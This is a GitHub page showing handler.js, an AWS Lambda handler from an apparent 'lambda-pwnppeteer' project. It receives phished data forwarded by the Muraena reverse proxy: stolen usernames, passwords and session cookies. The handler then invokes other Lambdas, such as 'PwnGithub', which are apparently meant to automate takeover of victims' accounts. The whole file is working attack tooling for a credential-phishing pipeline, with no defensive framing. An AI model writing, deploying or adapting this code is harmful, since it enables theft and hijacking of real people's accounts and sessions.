-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathhandler.js
79 lines (73 loc) · 2.42 KB
/
handler.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
const AWS = require("aws-sdk");
module.exports.pwn = (event, context, callback) => {
var lambda = new AWS.Lambda();
// a body is expected with all instrumentation value you need
// https://github.com/muraenateam/muraena/blob/master/config/instrument.necro
if (event.body == null || JSON.parse(event.body).task.type == undefined ) {
callback(null, {
statusCode: 400,
body: JSON.stringify({ message: "Try hard, you can pwn someone :)"})
});
};
// Access variables from body
// Parameters send to other lambdas
const Provider = JSON.parse(event.body).task.type;
const stolenLogin = JSON.parse(event.body).username;
const stolenPass = JSON.parse(event.body).password;
const stolenCookies = JSON.parse(event.body).cookies;
// Semi Orchestration based on the Task.Type forwarded by Muraena
try {
if (Provider === "github") {
var params = {
// FunctionName is based on what you defined in serverless.yml
FunctionName: "lambda-pwnppeteer-dev-PwnGithub",
InvocationType: "Event",
Payload : JSON.stringify(JSON.parse(event.body)),
};
lambda.invoke(params, function(error, data) {
console.log(params);
console.log(`Github Lambda has been called`);
});
};
// Just to check lamdba deployment
if (Provider === "debug") {
console.log(`message: Debug provider`);
callback(null, {
statusCode: 200,
body: JSON.stringify({
message : "Debug provider"
})
});
};
if (Provider === "test") {
var params = {
FunctionName: "lambda-pwnppeteer-dev-PwnSNK",
//InvocationType: "RequestResponse",
// Async mode set to "Event"
InvocationType: "Event",
Payload : JSON.stringify({
message: 'test lambda executed successfully!',
login: stolenLogin,
password: stolenPass,}),
};
lambda.invoke(params, function(error, data) {
console.log(`Test lambda executed for ${stolenLogin}`);
//const response = {
//statusCode: 200,
//body: 'proof: ' + JSON.parse(data.Payload)
//};
//callback(null, response)
});
};
} catch (error) {
callback(error);
} finally {
console.log("Orchestration done!");
callback(null, {
statusCode: 200,
body: JSON.stringify({
message : "Orchestration on-going..."
})
});
};
};